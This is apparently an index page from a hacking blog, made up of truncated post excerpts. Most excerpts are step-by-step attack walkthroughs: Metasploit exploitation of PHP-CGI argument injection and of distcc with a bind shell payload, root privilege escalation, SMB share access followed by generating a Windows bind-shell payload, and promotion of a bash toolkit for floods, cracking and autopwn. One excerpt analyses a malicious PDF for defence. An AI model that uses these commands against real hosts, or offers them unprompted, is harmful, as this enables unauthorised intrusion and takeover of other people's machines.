Art Of Explo1t

The following are some of the list of services and devices in the class that we can use to bluetooth exploitation. 1. List Bluetooth Class Device AUDIO_VIDEO (Value: 0x00000400) COMPUTER (Value: 0x00000100) HEALTH (Value: 0x00000900) IMAGING (Value: 0x00000600) MISC (Value: 0x00000000) NETWORKING (Value: 0x00000300) PERIPHERAL (Value: 0x00000500) PHONE (Value: 0x00000200) TOY (Value: 0x00000800) UNCATEGORIZED (Value: 0x00001f00) WEARABLE (Value: 0x00000700) 2. List Bluetooth Class Service AUDIO (Value: 0x00200000) CAPTURE (Value: 0x00080000) INFORMATION (Value: 0x00800000) LIMITED_DISCOVERABILITY (Value: 0x00002000) NETWORKING (Value: 0x00020000) OBJECT_TRANSFER (Value: 0x00100000) POSITIONING (Value: 0x00010000) RENDER (Value: 0x00040000) TELEPHONY (Value: 0x00400000) HOW TO..??? hciconfig = is used to configure Bluetooth devices. hci0 = the name of a Bluetooth device installed in the system. for help use this command: hciconfig --help ...

Hello all. Did you still loyal to my posts ? :) on this occasion I will show a few ways for you who likes to do penetration testing . as you know , a penetration testing was not only stopped when a problem to them , but on this occasion I will share some of these issues so that we can overcome. at this stage I would try to exploit the existing decrepitude on the CGI ( Common Gateway Interface ) for PHP ( Personal Home Page ) 5.x.x Description:   When run as a CGI , PHP 5.3.12 and up to version 5.4.2 is vulnerable   to an argument injection vulnerability . This module takes advantage   of the- d flag to set php.ini directives to Achieve code execution . (you can find the complete information when using a module that we use to type in the info ) ok, now i will show you about that :) open your metasploit using command: # msfconsole then type this command for use the module : command: msf > use exploit/multi/http/php_cgi_arg_injection msf exploi...

Hay guys tonight i will share how to get root privileges to start utilizing the vulnerability gap that exists on the machine "distcc". about distcc: Distcc is designed to speed up compilation by taking advantage of unused processing on another computer. How to : 1. scann the target using the command: nmap -p 1-56635 -sS target-ip-addr then look for port 3633 (distccd) 2. Open your metasploit and enter this command: msf > use exploit/unix/misc/distcc_exec msf exploit( distcc_exec) > set RHOST 192.168.1.10 RHOST => 192.168.1.10 msf exploit( distcc_exec ) > set PAYLOAD cmd/unix/bind_ruby PAYLOAD => cmd/unix/bind_ruby msf exploit( distcc_exec ) > exploit wait until the command shell session opened 3. then use this command : uname -r ( kernel version ) whoami ( print the user name associated with the current effective user ID ) this stage we do not get user id root. so, let's get started privilege escalation make sure the ker...

Introduction : On this occasion I will write some stages of how to analyze a document file extension *.PDF to Determine Whether they were malicious or not. This happened some time ago when I tried to download a study guide book and then the file is detected by anti-virus that I use. this creates great suspicion and then I try to analyze the file, and my guess is true in the document there is a java script which turns a script payload is wrapped into the document. This was some of the steps that I did to analyze. I would do a comparison between a clean PDF document with a document containing a trojan. Equipment : 1. pdfid 2. pdf-parser 3. pdftk.  'apt-get install pdftk' 4. strings in the first stage I will analyze the document " analysis.pdf " that is not interrupted by trojan. OK, now let's go it! test a pdf file # pdfid analysis.pdf the output looks, we just need to pay attention to the line JS / Java Script and turns of the output you ...

Happy new year, Happy new year =)) Like my previous appointment, today I officially released Minisplo1t v.2. Screen Shoot Minisplo1t v.2 Final Release: screen shoot for Main Menu 1 : screen shoot for Main Menu 2 : screen shoot for Main Menu 3 : screen shoot for Main Menu 4 : screen shoot for Main Menu 5 : I design tool using a bash script programming language, it is an open source bro =)) i like open source =)) How to : Download the file by clicking the download button below save in root Directory Extract file : tar -xvf Minisploi-v2-Final.tar Install File configuration ./install.sh starting the Minisploit cd Minisploit-Final/ ./minisplo1t.sh DOWNLOAD best regards Hidemichi-Hiroyuki a.k.a [H2]

before reading this post it helps you read the first post before http://h2-exploitation.blogspot.com/2013/10/exploit-samba-smbclient.html in the post I have discussed how the attacker got access rights to the shared folder that utilize port 445. in the previous post, the attacker can only access a folder, and the attacker is not permitted to see the Users folders, Windows, or other important folders. so, in this post we will see how the attacker gain full access rights like an admin. Equipments 1. Smbclient 2. Metasploit 3. Netcat Connecting using SmbClient: # smbclient //targetIP/Shared\ Folder -U ComputerName -p port [445] there are two files and one folder, but it can not satisfy me. I further undertake manufacturing using Bind TCP payload: # msfpayload windows/shell_bind_tcp LHOST=myIP LPORT=portListening X > Desktop/ Cantik.exe after storing the payload in the Desktop directory, I disconnect from the host victim and then go into the Desktop director...

After a long time did not make a post on the blog, I am finally back with a simple tool of bash programming language. This simple tool i design to simplify the users linux pentest edition (Linux and Backtrack time) to do the testing. I do not know too many programming ​​bash languages. so, I'm sorry if the script is very bad. Category : 1. Analysis     1. Bluetooth Phone Attack     2. FTP ATTACK     3. SSH ATTACK 2. Stress Testin g     1. Crack Route     2. Kill All     3. Flood Mode     4. Blacklist 3. Mini Exploit     1. AutoPwn         1. Addons Firefox 2. Browser Autopwn       2. Generate Payload 1. Meterpreter Reverse Tcp 2. Shell Bind Tcp extract file : # tar -xvf minisploit.tar permission : # chmod +x minisploit.sh Regards Hidemichi-Hiroyuki a.k.a [H2]

Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. in this case we have to get the victim to allow shared folders or files. Equipments : 1. SmbClient 2. Nmap 3. Metasploit The firstStep. scanning port the victim's ip-address using Nmap. in here that we need right port is port   445  microsoft-ds. # Nmap (Victim Ip-Address) seen in the picture above. I am lucky :) now, let us look the contents of the port # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) . seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.  Computer Name And NetBIOS Name is a ANONYMOUS-...